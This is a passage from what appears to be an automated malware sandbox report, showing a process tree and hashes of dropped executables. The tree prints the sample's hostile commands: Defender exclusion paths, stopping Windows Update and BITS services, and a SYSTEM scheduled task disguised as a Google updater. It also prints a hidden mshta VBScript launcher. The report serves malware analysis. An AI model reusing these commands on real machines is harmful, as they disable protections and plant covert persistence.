                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                      2⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2660
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                      2⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2176
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                      2⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:5780
                                                                    • C:\Windows\System32\cmd.exe
                                                                      C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                      2⤵
                                                                        PID:7304
                                                                        • C:\Windows\System32\sc.exe
                                                                          sc stop UsoSvc
                                                                          3⤵
                                                                          • Launches sc.exe
                                                                          PID:6008
                                                                        • C:\Windows\System32\sc.exe
                                                                          sc stop WaaSMedicSvc
                                                                          3⤵
                                                                          • Launches sc.exe
                                                                          PID:7480
                                                                        • C:\Windows\System32\sc.exe
                                                                          sc stop wuauserv
                                                                          3⤵
                                                                          • Launches sc.exe
                                                                          PID:8088
                                                                        • C:\Windows\System32\sc.exe
                                                                          sc stop bits
                                                                          3⤵
                                                                          • Launches sc.exe
                                                                          PID:5404
                                                                        • C:\Windows\System32\sc.exe
                                                                          sc stop dosvc
                                                                          3⤵
                                                                          • Launches sc.exe
                                                                          PID:7676
                                                                      • C:\Windows\System32\cmd.exe
                                                                        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                        2⤵
                                                                          PID:8120
                                                                          • C:\Windows\System32\sc.exe
                                                                            sc stop UsoSvc
                                                                            3⤵
                                                                            • Launches sc.exe
                                                                            PID:5188
                                                                          • C:\Windows\System32\sc.exe
                                                                            sc stop WaaSMedicSvc
                                                                            3⤵
                                                                            • Launches sc.exe
                                                                            PID:7952
                                                                          • C:\Windows\System32\sc.exe
                                                                            sc stop wuauserv
                                                                            3⤵
                                                                            • Launches sc.exe
                                                                            PID:6924
                                                                          • C:\Windows\System32\sc.exe
                                                                            sc stop bits
                                                                            3⤵
                                                                            • Launches sc.exe
                                                                            PID:5164
                                                                          • C:\Windows\System32\sc.exe
                                                                            sc stop dosvc
                                                                            3⤵
                                                                            • Launches sc.exe
                                                                            PID:6732
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                                                          2⤵
                                                                            PID:6028
                                                                          • C:\Windows\System32\cmd.exe
                                                                            C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                            2⤵
                                                                              PID:6232
                                                                              • C:\Windows\System32\powercfg.exe
                                                                                powercfg /x -hibernate-timeout-ac 0
                                                                                3⤵
                                                                                  PID:7460
                                                                                • C:\Windows\System32\powercfg.exe
                                                                                  powercfg /x -hibernate-timeout-dc 0
                                                                                  3⤵
                                                                                    PID:7796
                                                                                  • C:\Windows\System32\powercfg.exe
                                                                                    powercfg /x -standby-timeout-ac 0
                                                                                    3⤵
                                                                                      PID:7456
                                                                                    • C:\Windows\System32\powercfg.exe
                                                                                      powercfg /x -standby-timeout-dc 0
                                                                                      3⤵
                                                                                        PID:5352
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                                                                      2⤵
                                                                                        PID:5384
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                        2⤵
                                                                                          PID:6612
                                                                                          • C:\Windows\System32\powercfg.exe
                                                                                            powercfg /x -hibernate-timeout-ac 0
                                                                                            3⤵
                                                                                              PID:6056
                                                                                            • C:\Windows\System32\powercfg.exe
                                                                                              powercfg /x -hibernate-timeout-dc 0
                                                                                              3⤵
                                                                                                PID:7316
                                                                                              • C:\Windows\System32\powercfg.exe
                                                                                                powercfg /x -standby-timeout-ac 0
                                                                                                3⤵
                                                                                                  PID:5672
                                                                                                • C:\Windows\System32\powercfg.exe
                                                                                                  powercfg /x -standby-timeout-dc 0
                                                                                                  3⤵
                                                                                                    PID:2256
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                  2⤵
                                                                                                    PID:7224
                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                      sc stop UsoSvc
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:2604
                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                      sc stop WaaSMedicSvc
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:5612
                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                      sc stop wuauserv
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:2520
                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                      sc stop bits
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:8056
                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                      sc stop dosvc
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:8128
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                                                                                    2⤵
                                                                                                      PID:4760
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                                      2⤵
                                                                                                        PID:8064
                                                                                                        • C:\Windows\System32\powercfg.exe
                                                                                                          powercfg /x -hibernate-timeout-ac 0
                                                                                                          3⤵
                                                                                                            PID:5916
                                                                                                          • C:\Windows\System32\powercfg.exe
                                                                                                            powercfg /x -hibernate-timeout-dc 0
                                                                                                            3⤵
                                                                                                              PID:6796
                                                                                                            • C:\Windows\System32\powercfg.exe
                                                                                                              powercfg /x -standby-timeout-ac 0
                                                                                                              3⤵
                                                                                                                PID:6884
                                                                                                              • C:\Windows\System32\powercfg.exe
                                                                                                                powercfg /x -standby-timeout-dc 0
                                                                                                                3⤵
                                                                                                                  PID:6424
                                                                                                              • C:\Windows\System32\schtasks.exe
                                                                                                                C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                                                                                                                2⤵
                                                                                                                  PID:936
                                                                                                                • C:\Windows\System32\schtasks.exe
                                                                                                                  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                                                                                                                  2⤵
                                                                                                                    PID:7588
                                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                                    C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                                                                                                                    2⤵
                                                                                                                      PID:4472
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                      2⤵
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      PID:5136
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                      2⤵
                                                                                                                        PID:6264
                                                                                                                        • C:\Windows\System32\sc.exe
                                                                                                                          sc stop UsoSvc
                                                                                                                          3⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:6848
                                                                                                                        • C:\Windows\System32\sc.exe
                                                                                                                          sc stop WaaSMedicSvc
                                                                                                                          3⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:4588
                                                                                                                        • C:\Windows\System32\sc.exe
                                                                                                                          sc stop wuauserv
                                                                                                                          3⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:6392
                                                                                                                        • C:\Windows\System32\sc.exe
                                                                                                                          sc stop bits
                                                                                                                          3⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:6816
                                                                                                                        • C:\Windows\System32\sc.exe
                                                                                                                          sc stop dosvc
                                                                                                                          3⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:6140
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                                                        2⤵
                                                                                                                          PID:8156
                                                                                                                          • C:\Windows\System32\powercfg.exe
                                                                                                                            powercfg /x -hibernate-timeout-ac 0
                                                                                                                            3⤵
                                                                                                                              PID:8112
                                                                                                                            • C:\Windows\System32\powercfg.exe
                                                                                                                              powercfg /x -hibernate-timeout-dc 0
                                                                                                                              3⤵
                                                                                                                                PID:7252
                                                                                                                              • C:\Windows\System32\powercfg.exe
                                                                                                                                powercfg /x -standby-timeout-ac 0
                                                                                                                                3⤵
                                                                                                                                  PID:7608
                                                                                                                                • C:\Windows\System32\powercfg.exe
                                                                                                                                  powercfg /x -standby-timeout-dc 0
                                                                                                                                  3⤵
                                                                                                                                    PID:7424
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                                                                                                                  2⤵
                                                                                                                                  • Drops file in System32 directory
                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                  PID:6424
                                                                                                                                • C:\Windows\System32\conhost.exe
                                                                                                                                  C:\Windows\System32\conhost.exe
                                                                                                                                  2⤵
                                                                                                                                    PID:7840
                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                    2⤵
                                                                                                                                      PID:7848
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ebb444342c\legosa.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\ebb444342c\legosa.exe
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:3200
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\e8bff37b77\yiueea.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\e8bff37b77\yiueea.exe
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:4236
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:2268
                                                                                                                                  • \??\c:\windows\system32\mshta.exe
                                                                                                                                    mshta.exe vbscript:Execute("Set oShell = CreateObject (""Wscript.Shell""):Dim strArgs:strArgs = ""cmd -windowstyle hidden /c C:\Users\Public\Document\python.exe C:\Users\Public\Document\run.py"":oShell.Run strArgs, 0, false:window.close")
                                                                                                                                    1⤵
                                                                                                                                      PID:7832
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" -windowstyle hidden /c C:\Users\Public\Document\python.exe C:\Users\Public\Document\run.py
                                                                                                                                        2⤵
                                                                                                                                          PID:6068
                                                                                                                                          • C:\Users\Public\Document\python.exe
                                                                                                                                            C:\Users\Public\Document\python.exe C:\Users\Public\Document\run.py
                                                                                                                                            3⤵
                                                                                                                                            • Deletes itself
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:2864
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                              4⤵
                                                                                                                                                PID:3332
                                                                                                                                                • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                  tasklist
                                                                                                                                                  5⤵
                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                  PID:4296
                                                                                                                                        • C:\Program Files\Google\Chrome\updater.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\updater.exe"
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                          • Drops file in Drivers directory
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                          PID:8136
                                                                                                                                        • C:\Windows\windefender.exe
                                                                                                                                          C:\Windows\windefender.exe
                                                                                                                                          1⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                          PID:7668

                                                                                                                                        Network

                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                        Replay Monitor

                                                                                                                                        Loading Replay Monitor...

                                                                                                                                        Downloads

                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                          MD5

                                                                                                                                          24be8a92460b5b7a555b1da559296958

                                                                                                                                          SHA1

                                                                                                                                          94147054e8a04e82fea1c185af30c7c90b194064

                                                                                                                                          SHA256

                                                                                                                                          77a3cfe6b7eb676af438d5de88c7efcb6abcc494e0b65da90201969e6d79b2a3

                                                                                                                                          SHA512

                                                                                                                                          ed8ef0453e050392c430fdcf556249f679570c130decd18057e077471a45ab0bc0fba513cb2d4d1c61f3d1935318113b3733dec2bc7828a169b18a1081e609a0

                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                          Filesize

                                                                                                                                          302B

                                                                                                                                          MD5

                                                                                                                                          57556bbc84e3c8246fcc73e818e71b45

                                                                                                                                          SHA1

                                                                                                                                          10da0b96145d162d88f388dff1fce3ed3143ff17

                                                                                                                                          SHA256

                                                                                                                                          61160ae1c5f8cea59f1140973f31f696cbdaa0fb5d584b96afbb7b429b52bc44

                                                                                                                                          SHA512

                                                                                                                                          1f71fc1595389aa5e20f153b7292deb9ddc3d161fbd9766192d221852fcd2f2a517b105d5758a9de6d92845d0ec1193a0e6b26208ccc956c63d312687cfda2f5

                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\taskhost.exe.log

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          74b02915b8ed39b3508a8bd2d27b8e0d

                                                                                                                                          SHA1

                                                                                                                                          6e9a8794724a958b03eb3e0056a0cfdce33b7072

                                                                                                                                          SHA256

                                                                                                                                          2789a602511280d8d60d78ff578a8fcd215b71b70c9c32b8b926a4351ff5ea15

                                                                                                                                          SHA512

                                                                                                                                          c7eff4872c014e0b0e14618e9ca786eeb73431d203871ee82ed4af61d5a90d0c6fe487f99e14a9d348072fa6761e30a4c54fbcf68f799b78f6b30d594c9d4f05

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000139001\10c7b9izmah9.exe

                                                                                                                                          Filesize

                                                                                                                                          2.1MB

                                                                                                                                          MD5

                                                                                                                                          11087397686f250611da155d5a73143f

                                                                                                                                          SHA1

                                                                                                                                          51b39613601709a41332cede168749b09f6294f4

                                                                                                                                          SHA256

                                                                                                                                          a58281cf014986d06046512ca984861c6390c6ae99bf164d04d1943a8c959e7b

                                                                                                                                          SHA512

                                                                                                                                          09a1df0dcc5df7e8c63da422b07a9bc3843e8be18e9cce74274dc01ddaa0d16294071885128ccd97f6264a2d8bf14d453f3dcfb78e99060fe59c6d40811a17b0

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000139001\10c7b9izmah9.exe

                                                                                                                                          Filesize

                                                                                                                                          2.1MB

                                                                                                                                          MD5

                                                                                                                                          11087397686f250611da155d5a73143f

                                                                                                                                          SHA1

                                                                                                                                          51b39613601709a41332cede168749b09f6294f4

                                                                                                                                          SHA256

                                                                                                                                          a58281cf014986d06046512ca984861c6390c6ae99bf164d04d1943a8c959e7b

                                                                                                                                          SHA512

                                                                                                                                          09a1df0dcc5df7e8c63da422b07a9bc3843e8be18e9cce74274dc01ddaa0d16294071885128ccd97f6264a2d8bf14d453f3dcfb78e99060fe59c6d40811a17b0

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000139001\10c7b9izmah9.exe

                                                                                                                                          Filesize

                                                                                                                                          2.1MB

                                                                                                                                          MD5

                                                                                                                                          11087397686f250611da155d5a73143f

                                                                                                                                          SHA1

                                                                                                                                          51b39613601709a41332cede168749b09f6294f4

                                                                                                                                          SHA256

                                                                                                                                          a58281cf014986d06046512ca984861c6390c6ae99bf164d04d1943a8c959e7b

                                                                                                                                          SHA512

                                                                                                                                          09a1df0dcc5df7e8c63da422b07a9bc3843e8be18e9cce74274dc01ddaa0d16294071885128ccd97f6264a2d8bf14d453f3dcfb78e99060fe59c6d40811a17b0

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000146001\pf3bv0f2aw4mj.exe

                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          960401d9c2113bdb6207353557fe199d

                                                                                                                                          SHA1

                                                                                                                                          3513d8ed2314fdc0bc4c150b6f1028befc837639

                                                                                                                                          SHA256

                                                                                                                                          53bb60a7357a31c914145dafb72c45559d4f214f471274c997d2ed37969e300c

                                                                                                                                          SHA512

                                                                                                                                          c221693c430ee8287301e2030577971f8a06308205fbec1557d436eb2c228f6cebc6c87a11e0f56f2a098b06a3a340747b8bb751ed18a5bb035b2b11b2987fb2

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000146001\pf3bv0f2aw4mj.exe

                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          960401d9c2113bdb6207353557fe199d

                                                                                                                                          SHA1

                                                                                                                                          3513d8ed2314fdc0bc4c150b6f1028befc837639

                                                                                                                                          SHA256

                                                                                                                                          53bb60a7357a31c914145dafb72c45559d4f214f471274c997d2ed37969e300c

                                                                                                                                          SHA512

                                                                                                                                          c221693c430ee8287301e2030577971f8a06308205fbec1557d436eb2c228f6cebc6c87a11e0f56f2a098b06a3a340747b8bb751ed18a5bb035b2b11b2987fb2

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000146001\pf3bv0f2aw4mj.exe

                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          960401d9c2113bdb6207353557fe199d

                                                                                                                                          SHA1

                                                                                                                                          3513d8ed2314fdc0bc4c150b6f1028befc837639

                                                                                                                                          SHA256

                                                                                                                                          53bb60a7357a31c914145dafb72c45559d4f214f471274c997d2ed37969e300c

                                                                                                                                          SHA512

                                                                                                                                          c221693c430ee8287301e2030577971f8a06308205fbec1557d436eb2c228f6cebc6c87a11e0f56f2a098b06a3a340747b8bb751ed18a5bb035b2b11b2987fb2

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000147001\useyyoou_crypted.exe

                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          887e2ba60e03c2b0d79a63a6548e1720

                                                                                                                                          SHA1

                                                                                                                                          04b44c1bdbac152d6379eec5a6de4e46fd6328b3

                                                                                                                                          SHA256

                                                                                                                                          1379aee1bf57a5d4e826d7ef56254274f6cffa3fecaa08b2ff96dd9dfc6c7d51

                                                                                                                                          SHA512

                                                                                                                                          7497f8ea8d4b411e50d81e9e974144cd9a82911ac08fafe0355c33f7833c29f39dc077e7ccfa52748289e479b333662d1ede0f85d101a5ec5a86384bf0db9fb4

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000147001\useyyoou_crypted.exe

                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          887e2ba60e03c2b0d79a63a6548e1720

                                                                                                                                          SHA1

                                                                                                                                          04b44c1bdbac152d6379eec5a6de4e46fd6328b3

                                                                                                                                          SHA256

                                                                                                                                          1379aee1bf57a5d4e826d7ef56254274f6cffa3fecaa08b2ff96dd9dfc6c7d51

                                                                                                                                          SHA512

                                                                                                                                          7497f8ea8d4b411e50d81e9e974144cd9a82911ac08fafe0355c33f7833c29f39dc077e7ccfa52748289e479b333662d1ede0f85d101a5ec5a86384bf0db9fb4

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000147001\useyyoou_crypted.exe

                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          887e2ba60e03c2b0d79a63a6548e1720

                                                                                                                                          SHA1

                                                                                                                                          04b44c1bdbac152d6379eec5a6de4e46fd6328b3

                                                                                                                                          SHA256

                                                                                                                                          1379aee1bf57a5d4e826d7ef56254274f6cffa3fecaa08b2ff96dd9dfc6c7d51

                                                                                                                                          SHA512

                                                                                                                                          7497f8ea8d4b411e50d81e9e974144cd9a82911ac08fafe0355c33f7833c29f39dc077e7ccfa52748289e479b333662d1ede0f85d101a5ec5a86384bf0db9fb4

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000155001\crypted158.exe

                                                                                                                                          Filesize

                                                                                                                                          702KB

                                                                                                                                          MD5

                                                                                                                                          bb115dccc24769565832379a2029f709

                                                                                                                                          SHA1

                                                                                                                                          fee2c45c8d2b14e87da81baf041adf6258519114

                                                                                                                                          SHA256

                                                                                                                                          0dbde9f9147ace2898ded2819edb2c6ad460cbbfaf6f82f15313c011634d602a

                                                                                                                                          SHA512

                                                                                                                                          319904a041a1cd4325c5e9e6d9cb5118517df0f0f9db85c3b9ee1d443e24f17439930e196e3439bab47aa04ec7f8806646672a873ac280d58523c9ba33d96edd

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000155001\crypted158.exe

                                                                                                                                          Filesize

                                                                                                                                          702KB

                                                                                                                                          MD5

                                                                                                                                          bb115dccc24769565832379a2029f709

                                                                                                                                          SHA1

                                                                                                                                          fee2c45c8d2b14e87da81baf041adf6258519114

                                                                                                                                          SHA256

                                                                                                                                          0dbde9f9147ace2898ded2819edb2c6ad460cbbfaf6f82f15313c011634d602a

                                                                                                                                          SHA512

                                                                                                                                          319904a041a1cd4325c5e9e6d9cb5118517df0f0f9db85c3b9ee1d443e24f17439930e196e3439bab47aa04ec7f8806646672a873ac280d58523c9ba33d96edd

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000155001\crypted158.exe

                                                                                                                                          Filesize

                                                                                                                                          702KB

                                                                                                                                          MD5

                                                                                                                                          bb115dccc24769565832379a2029f709

                                                                                                                                          SHA1

                                                                                                                                          fee2c45c8d2b14e87da81baf041adf6258519114

                                                                                                                                          SHA256

                                                                                                                                          0dbde9f9147ace2898ded2819edb2c6ad460cbbfaf6f82f15313c011634d602a

                                                                                                                                          SHA512

                                                                                                                                          319904a041a1cd4325c5e9e6d9cb5118517df0f0f9db85c3b9ee1d443e24f17439930e196e3439bab47aa04ec7f8806646672a873ac280d58523c9ba33d96edd

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000159001\rockas.exe

                                                                                                                                          Filesize

                                                                                                                                          198KB

                                                                                                                                          MD5

                                                                                                                                          a64a886a695ed5fb9273e73241fec2f7

                                                                                                                                          SHA1

                                                                                                                                          363244ca05027c5beb938562df5b525a2428b405

                                                                                                                                          SHA256

                                                                                                                                          563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

                                                                                                                                          SHA512

                                                                                                                                          122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000159001\rockas.exe

                                                                                                                                          Filesize

                                                                                                                                          198KB

                                                                                                                                          MD5

                                                                                                                                          a64a886a695ed5fb9273e73241fec2f7

                                                                                                                                          SHA1

                                                                                                                                          363244ca05027c5beb938562df5b525a2428b405

                                                                                                                                          SHA256

                                                                                                                                          563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

                                                                                                                                          SHA512

                                                                                                                                          122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000159001\rockas.exe

                                                                                                                                          Filesize

                                                                                                                                          198KB

                                                                                                                                          MD5

                                                                                                                                          a64a886a695ed5fb9273e73241fec2f7

                                                                                                                                          SHA1

                                                                                                                                          363244ca05027c5beb938562df5b525a2428b405

                                                                                                                                          SHA256

                                                                                                                                          563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

                                                                                                                                          SHA512

                                                                                                                                          122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000167001\rockas.exe

                                                                                                                                          Filesize

                                                                                                                                          198KB

                                                                                                                                          MD5

                                                                                                                                          a64a886a695ed5fb9273e73241fec2f7

                                                                                                                                          SHA1

                                                                                                                                          363244ca05027c5beb938562df5b525a2428b405

                                                                                                                                          SHA256

                                                                                                                                          563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

                                                                                                                                          SHA512

